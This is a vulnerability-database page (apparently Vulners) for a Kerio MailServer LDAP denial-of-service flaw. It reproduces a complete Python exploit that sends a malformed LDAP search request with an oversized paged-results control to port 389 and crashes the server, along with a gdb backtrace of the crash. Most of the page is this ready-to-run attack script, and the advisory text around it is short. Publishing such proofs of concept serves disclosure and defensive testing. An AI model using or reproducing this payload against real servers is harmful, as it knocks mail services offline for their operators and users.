Vulners
Lucene search
Kerio MailServer 5.x/6.x Remote LDAP Denial of Service Vulnerability
source: http://www.securityfocus.com/bid/21091/info
Kerio MailServer is prone to a denial-of-service vulnerability due to a flaw when handling malformed network traffic.
Successful exploits will result in denial-of-service conditions.
#!/usr/bin/env python
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS
# fixed in Kerio MailServer 6.3.1
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
gdb backtrace:
# gdb -q ./mailserver core.18450
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from shared object read from target memory...(no debugging
symbols found)...done.
Loaded system supplied DSO at 0xb76000
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
Program terminated with signal 11, Segmentation fault.
...
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
(gdb) bt
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
#1 0x0821c387 in LDAPSearchRequest::setAll ()
#2 0x08093d8a in Ber::getSearchRequest ()
#3 0x08205e48 in LDAPServer::search ()
#4 0x08207de0 in LDAPServer::server ()
#5 0x08207e2e in ldap_handler ()
#6 0x0841be13 in KServerTask::handler ()
#7 0x082033c6 in KThreadPool::workerThread ()
#8 0x086ee7b6 in kerio::tiny::thread ()
#9 0x00772b80 in start_thread () from /lib/libpthread.so.0
#10 0x00558dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>:
mov (%eax),%edx
(gdb) i r eax
eax 0x449 1097
"""
from socket import *
host = "localhost"
port = 389
s = "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"
s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"
s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"
s += "\x20\x30\x82\x04\x1c"
s += "\x01"*1024
s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"
s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"
s += "\x00"
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
sock.sendall(s)
sock.recv(10000)
sock.close()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1